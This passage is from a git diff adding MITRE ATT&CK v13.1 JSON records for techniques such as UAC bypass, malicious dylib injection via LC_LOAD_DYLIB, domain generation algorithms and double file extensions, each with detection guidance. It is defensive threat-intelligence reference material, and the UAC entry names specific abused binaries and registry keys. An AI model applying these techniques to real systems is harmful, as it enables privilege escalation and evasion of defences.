the exposed API or application.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Containers", + "macOS" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "created": "2017-05-31T21:31:44.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1133", + "external_id": "T1133" + }, + { + "source_name": "Volexity Virtual Private Keylogging", + "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", + "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/" + }, + { + "source_name": "MacOS VNC software for Remote Desktop", + "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "Trend Micro Exposed Docker Server", + "description": "Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44.json new file mode 100644 index 0000000000000000000000000000000000000000..d63cdce79a46b3da29b26e18ff18265406734b43 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--39a11eb0-0766-4c49-bc39-6ad5657e2057", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "type": "attack-pattern", + "created": "2017-05-31T21:31:22.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1109", + "url": "https://attack.mitre.org/techniques/T1109" + }, + { + "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.", + "source_name": "SanDisk SMART" + }, + { + "url": "https://www.smartmontools.org/", + "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", + "source_name": "SmartMontools" + }, + { + "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html", + "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", + "source_name": "ITWorld Hard Disk Health Dec 2014" + } + ], + "modified": "2020-10-23T15:04:14.614Z", + "name": "Component Firmware", + "description": "Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "File monitoring", + "Host intrusion prevention systems", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to update component device firmware from the host operating system." + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847.json new file mode 100644 index 0000000000000000000000000000000000000000..30a0e28ba02331a3bdfd64e1bcb3de7678ee7574 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--e4b3adb1-4d13-4e29-af2b-664525e903c5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", + "created": "2020-01-24T14:21:52.750Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1546.006", + "url": "https://attack.mitre.org/techniques/T1546/006" + }, + { + "source_name": "Malware Persistence on OS X", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017." + }, + { + "source_name": "Writing Bad Malware for OSX", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn\u2019t checked at load time.(Citation: Malware Persistence on OS X)", + "modified": "2022-04-20T17:08:21.101Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "LC_LOAD_DYLIB Addition", + "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "File: File Metadata", + "Process: Process Creation", + "Module: Module Load", + "Command: Command Execution", + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1126cab1-c700-412f-a510-61f4937bb096.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1126cab1-c700-412f-a510-61f4937bb096.json new file mode 100644 index 0000000000000000000000000000000000000000..cf8b04f447db9ec605cd3f3bef89254d394a017e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1126cab1-c700-412f-a510-61f4937bb096.json @@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--a84cf282-0f54-442e-80ec-49a4280a2b09", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T16:23:05.392Z", + "name": "Container Orchestration Job", + "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Container: Container Creation", + "Scheduled Job: Scheduled Job Creation", + "File: File Creation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "id": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", + "created": "2021-03-29T17:06:22.247Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/007", + "external_id": "T1053.007" + }, + { + "source_name": "Kubernetes CronJob", + "description": "The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/" + }, + { + "source_name": "Kubernetes Jobs", + "description": "The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/job/" + }, + { + "source_name": "Threat Matrix for Kubernetes", + "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd.json new file mode 100644 index 0000000000000000000000000000000000000000..35d31998260acedca7438ef920d96031ed665fb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd.json @@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--8f2e5b86-04f0-45e2-b30c-2618f33ee73b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ryan Benson, Exabeam", + "Barry Shteiman, Exabeam", + "Sylvain Gil, Exabeam" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "type": "attack-pattern", + "created": "2020-03-10T17:44:59.787Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1568.002", + "url": "https://attack.mitre.org/techniques/T1568/002" + }, + { + "source_name": "Cybereason Dissecting DGAs", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf", + "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019." + }, + { + "source_name": "Cisco Umbrella DGA", + "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/", + "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms \u2013 Why so effective?. Retrieved February 18, 2019." + }, + { + "source_name": "Unit 42 DGA Feb 2019", + "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/", + "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019." + }, + { + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "source_name": "Talos CCleanup 2017" + }, + { + "source_name": "Akamai DGA Mitigation", + "url": "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html", + "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019." + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "source_name": "FireEye POSHSPY April 2017" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019." + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "Pace University Detecting DGA May 2017", + "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf", + "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019." + }, + { + "source_name": "Elastic Predicting DGA", + "url": "https://arxiv.org/pdf/1611.00791.pdf", + "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019." + } + ], + "modified": "2022-03-11T18:26:23.432Z", + "name": "Domain Generation Algorithms", + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or \u201cgibberish\u201d strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e.json new file mode 100644 index 0000000000000000000000000000000000000000..1c817e290978d204cce1825276de4cb3179d0443 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--1b226c49-87f8-4f40-bd07-b53776c18cbd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "type": "attack-pattern", + "created": "2021-08-04T20:54:03.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1036.007", + "url": "https://attack.mitre.org/techniques/T1036/007" + }, + { + "source_name": "PCMag DoubleExtension", + "url": "https://www.pcmag.com/encyclopedia/term/double-extension", + "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021." + }, + { + "source_name": "SOCPrime DoubleExtension", + "url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/", + "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021." + }, + { + "source_name": "Seqrite DoubleExtension", + "url": "https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/", + "description": "Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021." + } + ], + "modified": "2021-10-14T21:09:59.588Z", + "name": "Double File Extension", + "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Creation", + "File: File Metadata" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073.json new file mode 100644 index 0000000000000000000000000000000000000000..c0f673b9aa357a79b46ba82748d176c2b3832dbc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073.json @@ -0,0 +1,119 @@ +{ + "type": "bundle", + "id": "bundle--bfd5b208-bfd7-4a22-8705-a62aa912318f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T12:35:39.112Z", + "name": "Bypass User Account Control", + "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Stefan Kanthak", + "Casey Smith" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Metadata" + ], + "x_mitre_defense_bypassed": [ + "Windows User Account Control" + ], + "x_mitre_effective_permissions": [ + "Administrator" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "created": "2020-01-30T14:24:34.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/002", + "external_id": "T1548.002" + }, + { + "source_name": "Davidson Windows", + "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", + "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" + }, + { + "source_name": "TechNet How UAC Works", + "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" + }, + { + "source_name": "SANS UAC Bypass", + "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", + "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass" + }, + { + "source_name": "MSDN COM Elevation", + "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx" + }, + { + "source_name": "enigma0x3 Fileless UAC Bypass", + "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", + "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/" + }, + { + "source_name": "enigma0x3 sdclt app paths", + "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/" + }, + { + "source_name": "enigma0x3 sdclt bypass", + "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + }, + { + "source_name": "TechNet Inside UAC", + "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", + "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx" + }, + { + "source_name": "Fortinet Fareit", + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", + "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": 